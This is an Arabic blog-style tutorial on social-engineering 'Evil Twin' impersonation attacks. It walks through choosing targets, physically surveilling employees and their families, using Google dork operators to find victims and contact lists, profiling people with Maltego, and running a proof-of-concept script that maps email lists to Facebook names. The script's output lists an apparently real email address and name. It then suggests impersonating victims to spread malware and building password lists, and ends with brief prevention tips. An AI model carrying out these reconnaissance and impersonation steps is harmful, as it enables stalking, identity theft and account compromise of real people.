عموما في هذا الموضوع سوف القي الضوء على بعض النقاط والتقنيات التي يمكن استخدامها في هذه الهجمات.

مقدمة:

تطور الانترنت بشكل كبير وأصبحت التقنية الاكثر اختراقا لحياتنا اليومية واصبحنا نعتمد عليها في كل صغيرة وكبيرة واصبحت الشبكة اليوم عبارة عن مركز هام لتدوين افكار وثقافات الشعوب المختلفة ولكن كما نعلم لكل شيئ عيوبه ومزاياه  فأنت تسخدم الانترنت لغرض التواصل وتبادل الافكار لكن ألآف غيرك يستخدمون الانترنت لاصطياد الكثير من المستخدمين امثالك اثناء تصفحهم عبر الشبكة.بمعنى  آخر مااريد قوله ماتقدمه انت من معلومات على الانترنت بحسن نية لغرض التعارف والتواصل وتبادل الأفكار قد يستخدمه اخر ضدك مثلا قد يستخدم معلوماتك لانتحال شخصيتك مثلا والذي قد يؤدي الى الوصول لمعلومات حساسة فمثلا قد تكون مدير شبكة لشركة وبالتالي تعرض بينات الشركة للاختراق .عموما سوف اقوم الآن بشرح بعض الخطوات والTechniqes البسيطة والتي يمكن استخدامها في تنفيذ هذه الهجمات.

أولا: حدد هدفك واعرف من الذي تتعامل معه

Target
قبل ان يقوم المهاجم بتنفيذمثل هذه الهجمات عليه أن يعرف من يتعامل معه مثلا فلو كان الهدف شركة كبيرة فعليه أن يتوقع اجراءات أمنية صارمة وان الهدف لن يكون سهل لو كان الهدف افراد عاديين مثلا فقد يكون نسبة كبيرة منهم سذج نوعا ما وبالتالي ارتفاع معدل نجاح الهجمة ماأقصده كل ماكانت معرفتك بالخصم دقيقة كلما اقتربت للهدف اكثر ايضاعليك أن تضع اهداف واضحة في مهمتك  لكي تستطيع رسم خطتك بوضوح وعلى اساس متين فمثلا لو كان هدفك مدير الشبكة الذي يملك الباسوردالخاصة بخدمة معينة لسرفر الشركة المستهدفة فأي شيء او اي شخص يمكن من خلاله الوصول لمدير الشبكة هو هدف لنا أيضا.

ثانيا: Information gathering about our goals

كما نعلم أن أي عملية Pen test أو اختراق مدروسة تكون أول خطوة فيها هي خطوة جمع المعلومات وهي التي ستحدد مصير الهجمة فيما بعد فان كانت المعلومات التي قمت بجمعها صحيحة هذا سيرفع نسبة نجاح هجومك عموما سنتستعرض هنا بعض الخطوات والتقنيات التي من خلالها نستطيع جمع بينات عن اهدافنا المختلفة والتي ستساعدنا في بناء توأم شرير Evil Twin فلنبدأ:

* جمع البيانات من خلال الاحتكاك الفزيائي:
اذا كان الهدف \ أهداف قريب منك وتستطيع الاحتكاك به فزيائيا اي تستطيع الوصول له بشكل مادي فهذا يسهل بالتأكيد المهمة عليك فابمكانك جمع معلومات عن اهدافك من البيئة المحيطة بهم او بالاحتكاك معهم مباشرة من خلال الحديث معهم مثلا اذا كان الهدف شركة مثلا فبامكانك الذهاب الى موقع هذه الشركة والبدأ بجمع البينات عن الاشخاص المستهدفين بهذه الشركة
  • كمواعيد الدوام الخاصة بعملهم.
  • العلاقة بينهم وبين زملائهم في العمل.
  • او مثلا جمع البينات عن عائلة كاسمه واسم اولاده مثلا.
  • او حتى معرفة الاماكن التي يفضلها.
  • او جمع معلومات عن المنتجات الخاصة بالشركة المستهدفة مثلا.

باختصار جمع البينات بهذه الطريقة تعني ان الاهداف ستكون تحت المراقبة بشكل مباشر مما سعيطينا كم هائل من المعلومات عن اهدافنا ويرفع نسبة نجاح هجومنا ايضا!
* جمع البيانات باستخدام البيانات المتاحة لنا على الشبكة:
كما ذكرت بالمقدمة شبكة الانترنت الان اصبحت مركز هام لتدوين ثقافات وافكار الشعوب وان ماتكتبه وتضعه من معلومات عنك في هذه الشبكة قد يصبح مصدر معلومات جيد عن طريقة حياتك وافكارك لاحد عديمي الضميرليقومون بانتحال شخصيتك مثلا.
ربما قد يظن البعض ان جمع بينات عن شخص ما عبر الشبكة قد يكون صعب لكن اؤكد لك انه لم يعد كذلك الآن بفضل محركات البحث والشبكات الاجتماعية عموما سوف اقوم بشرح بوضع بعض الطرق التي يمكن استخدامها من محركات البحث او الشبكات الاجتماعية او حتى باستخدام ادوات وسكربتات تم برمجتها لهذا الغرض.

جمع المعلومات باستخدام محركات البحث:
من منا لايستخدم محرك البحث جوجل! هل سبق وسألت جوجل عن اسمك إن لم تفعل فيجدر بك ذلك لأنه سوف يجيب بالتأكيد؟!
طبعا اتحدث عن جوجل هنا بحكم انه محرك البحث الاكثر شعبية والاكثر استخداما على الاطلاق حيث يشكل تقريبا مايزيد عن 80% من محركات البحث في الشبكة العنكبوتية. افضل مايعجبني في محرك البحث جوجل انه يعطيك ماتبحث عنه وماتريده بالظبط وبشكل مرتب ايضا طبعا ليس كل مانريده نحن البشر دائما جيد وبالتالي كنت اتمنى لو كان عمو جوجل سوف يقول للطلبات السيئة كلمة "لا" للاسف هذه الكلمة الوحيدة الغير مدونة في سجلات جوجل!

الاف من الاشخاص يتصفحون جوجل لعمل access على البينات المنشورة على الشبكة على هيئة نتائج مرتبة بشكل منظم قد يكون ماتريده الوصول لملف معين كتاب مثلا وقد يكون مااريده انا ايضا ملف لكن ماذا لو كان لملف يحتوي على معلومات حساسة قد يكون ماتريد الوصول اليه صفحة في موقع معين وقد اكون ايضا اريد الوصول الى رابط صفحة معينة ايضا لكنها صفحة لـ Network Device تابع  لشبكة معينة قد يؤدي لاختراقها. باختصار اذا كنت تريد اداة جبارة لجمع البينات عن اي شيء تريده فجوجل هو الخيار الامثل بالتأكيد خاصة ايضا ان جوجل لم يكتفي بكل هذا فحسب بل جوجل يوفر لنا Advanced operators لتسهيل الوصول للمعلومات التي نريدها وتنظيمها بشكل افضل وسوف اقوم باعطاء نبذة عنها الآن في الفقرة التالية بعنوان Google Hacking techniqe.


Google Hacking techniqe:
ماهي الـ Advanced operators؟ هي مصطلحات خاصة يقدمها لنا محرك البحث جوجل للوصول للمعلومات التي نريدها بشكل اسرع وادق. طبعا كما قلت بالمقدمة ان  جوجل سلاح ذو حدين هذه الـ operators قد توفر علينا الوصول للصفحات والمعلومات التي نريدها بشكل اسرع وتجعل التصفح عبر جوجل اكثر كفائة ودقة لكنها ايضا توفر الوقت بشكل ممتاز بنفس الكفائة والدقة للمخترقين للوصول لمايريدون عموما هناك الكثير من operators يقدمها لنا جوجل وقد وضعت جدول كما ترون يوجد الأمثلة ووصف لعمل كل operator.

Google Hacking

انظر للصورة ولاحظ جيدا الصيغة التي يجب أن تكون عليها الـ operators syntax بشكل صحيح. عموما اذا كنت ترغب في الاطلاع على اساسيات google hacking والتعمق فيه فهناك الكثير من المقالات والكتب المتوفرة مثل كتاب Google Hacking For Penteration Testers من شركة Syngress. المهم ما اريد قوله في هذه الفقرة يمكنك استخدام هذه الـ operator لتحديد المعلومات المتوفرة في سجلات جوجل عن الهدف بدقة ومن الامثلة التي يمكن استخدامها:
site:www.facebook.com "victim"-1
بامكاننا من خلال الـ operator الموضح في المثال البحث عن الصفحات التي ذكر فيها اسم victim في موقع معين كالفيس بوك مثلا.
Intitle:"victim"-2
يقوم intitle operator بارجاع الصفحات الذي يوجد فيها الاسم الذي نبحث عنه في الـ intitle tag الخاص بها.
Filetype:ctt "msn"-3
بامكاننا مثلا البحث من خلال هذا الـ operator عن جميع الـ contact list بامتداد ctt لشركة او موقع معين مثلا وفي مثالنا هذا سوف تلاحظ اني قمت بالبحث عن الـ contact list المتوفرة على جوجل للـ MSN.
عموما الـ operators المتوفرة لنا والتي ستساعدنا في جمع معلومات وبناء توأمنا الشرير كثيرة وكما ذكرت منذ قليل يمكنك بالاطلاع على مقالات او كتب تتكلم عن google hacking بشكل مفصل إن اردت لانه لو احببت أن أفصل هنا سوف يطول الموضوع بنا جدا.


جمع البيانات عن طريق الشبكات الاجتماعية:
facebook confidential
تطورت الشبكات الاجتماعية بشكل كبير اليوم واصبحت تحتل حيز كبير من نشاطنا عبر الانترنت وأصبح من النادر أن تجد شخص ليس له حساب على شبكة اجتماعية اوكثر مثل facebook و twitteer...
اليوم لم تعد تحتاج الكثير من العناء للحصول على بينات البطاقة الشخصية لهدفك لان الشبكات الاجتماعية توفر لك ذلك الآن على طبق من ذهب. يمكنك أن تتسأل كم شخص يضع صور له وبينات حقيقية خاصة به على الـ facebook مثلا وماذا يمكن أن تفعل بهذه البينات؟ عموما بالطبع الشبكات الاجتماعية مصدر ومكان مناسب جدا لتنفيذ هجمات Evil Twin.


جمع البيانات باستخدام اداوات مساعدة:
في هذه الفقرة سوف نقوم باستخدام اداوات اعددت خصيصا لجمع المعلومات عن الهدف خاص المعلومات الاجتماعية  والادوات التي سنتحدث عنها هي:

أداة Maltego: لاأعتقد ان هناك شخص متعمق في طرق جمع البيانات Information gathering ولم يمر عليه هذا البرنامج الجبار في جمع البينات وتحليلها البرنامج بصراحة مذهل ويعمل بكفائة عالية جدا في استخراج جميع البينات الممكنة عن الهدف سواء كان الهدف ip مثلا لسرفر معين او حتى موقع معين او شبكة او حتى اسم شخص او E-mail مثلا. عندما تقوم بفتح برنامج maltego ستجد انه يقسم انواع البينات التي يتم جمعها الى ثلاثة اقسام.

Maltego
Maltego
أعتقد الصور الموضح فيها أقسام البينات لاتحتاج لشرح ماهية البينات التي سوف يتم استخراجها بالنسبة لطريقة الاستخدام فهناك ملف pdf رائع في الموقع الخاص بالرنامج نفسه يقوم شرح استخدام البرنامج بالكامل. maltego برنامج اكثر من رائع يكفي فقط مميزاته والبينات التي يستخرجها كالاميلات والحسابات على الشبكات الاجتماعية وارقام الهاتف وحتى مكان الاقامة ومعلومات عن السيرة الشخصية ان وجدت عن الهدف فإن كنت تريد اداة جبارة خاصة في الهندسة الاجتماعية maltego هي خيارك الامثل بالتأكيد. صفحة التحميل

اداة fbextract.php لاستخراج اسماء الـ facebook: قام Atul Agarwal باكتشاف مشكلة في facebook وهي عند دخولك وتسجيلك باميل له حساب على facebook وادخلت الباسورد مثلا بطريقة خاطئة فسوف يظهر لك الـ profile الخاص بالحساب الخاص بالاميل فقام ببرمجة php script بسيط لتسهيل هذه العملية من خلاله نستطيع استخراج اسماء الـ facebook من مجموعة من الاميلات.
fbextract

طريقة الاستخدام: قم بتحميل الاداة من هذا الرابط ثم فك الضغط عنها وقم بالدخول الى مسار الملف من خلال شاشة terminal ثم نفذ الامر التالي:
php fbextract_php.bin
لتظهر لك الشاشة الافتتاحية التالية وفيها شرح مختصر لاستخدام الاداة:
*****************************************************
* Facebook name extract POC, by atul@secfence.com   *
* Usage : fbextract.php target_list output_file     *
* Check the script for more details, such as random *
* name generation and proxy settings                *
*****************************************************
الآن قم بعمل ملف text لتضع فيه الاميلات اللتي قمت بجمعها ولقد اسميت الملف في حالتنا هذه مثلا email.txt الآن قم بتنفيذ الامر  التالي:
root@bt:/pentest/bluetooth# php fbextract_php.bin email facebook

*****************************************************
* Facebook name extract POC, by atul@secfence.com   *
* Check the script for more details, such as random *
* name generation and proxy settings                *
*****************************************************

target_list=email.txt output_file=facebook
Output file already exists. Will be overwritten.

Loaded 4 targets. Starting ..

elnimrelmasry@hotmail.com, 7984811,elnimr elmasry
aaa@hotmail.com, 9141731, INVALID
ee.ss@hotmail.com, 5855539, INVALID
bbb@hotmail.org, 2044078, INVALID
utput succesfuly stored in facebook
كما ترى بالاعلى يقوم السكربت باختبار الايميلات الموجودة في الـ target_list ويعطيك النتيجة ثم يقوم بتخزينها في output_file.

ثالثا: الهجوم

SWAT
طوال الوقت ونحن نقوم بجمع البينات تحضيرا لبناء الـ Evil Twin. الآن وبعد أن قمت ببناء البينات يمكنك استخدامها في عمل توأمك الشرير باكثر من طريقة مثلا يمكنك عمل حساب على احد الشبكات الاجتماعية باسم احد الاشخاص وانتحال شخصيته لنشر maleware مثلا المهم هناك طرق كثيرة لتنفيذ هذه الهجمة وبالطبع يمكننا استخدام المعلومات التي جمعناها في هجمات اخرى كهجمات الpassword offline attack بحيث تكون هذه المعلومات good source نستطيع من خلالها انشاء قائمة جيدة من الباسوردات. عموما الطريق الآن مفتوح للهجمات التي تعتمد خاصة على الهندسة الاجتماعية.

رابعا: نصائح للوقاية من هجمات الهندسة الاجتماعية بشكل عام

الهندسة الاجتماعية كما قلت في أول الموضوع ليست ثغرة تقنية في نظام معين بل هي ثغرات في انظمة البشر ويقوم باستغلالها بعض الاشخاص الذي يملكون قدر كبير من الخبرة في هذه الحياة للدخول لانظمة هؤلا الاشخاص والتحكم فيهم تماما كما يتحكم المخترق في النظام الذي تم اختراقه وبالتالي يجب مثلا اذا كان هناك شخص يمتلك شركة معينة عليه أن يقوم بتوعية الموظفين وخاصة هؤلاء الذين يملكون مراكز حساسة في الشركة مثلا عن طريق عمل pent test من مختصين بحيث يكون الاختبار يحتوي على مثل هذه الهجمات.
أيضا يجب أن يكون هناك اجراءات امنية صارمة تمنع وضع بينات خاصة بالشركة حتى ولو كانت عامة وليست حساسة "قد تكون معلومات غير حساسة لكنها قد تكون المفتاح الذي سيدخل المخترق به".

أذا كنت تملك حسابات في الشبكات الاجتماعية او اي شيء على الشبكة يمكن ان يعطي معلومات عنك حاول استخدم الاعدادات والاجراءات الأمنية المتاحة في الـ apllication الخاص بالشبكة الاجتماعية مثلا بحيث يتم عرض معلوماتك فقط للاصدقاء وليس للجميع.

عندما تتحدث مع صديقك تأكد أن ليس له أخ توأم يريد العبث معك!!

أخيرا: نحن البشر عقولنا معقدة جدا ونملك من الخير تماما بمقدار ما نملكه من الشر ولهذا عليك دائما أن تتأكد من الذي يبتسم لك أن ابتسامته بيضاء ناصعة وليست لون آخر!!


إقرأ المزيد Résuméabuiyad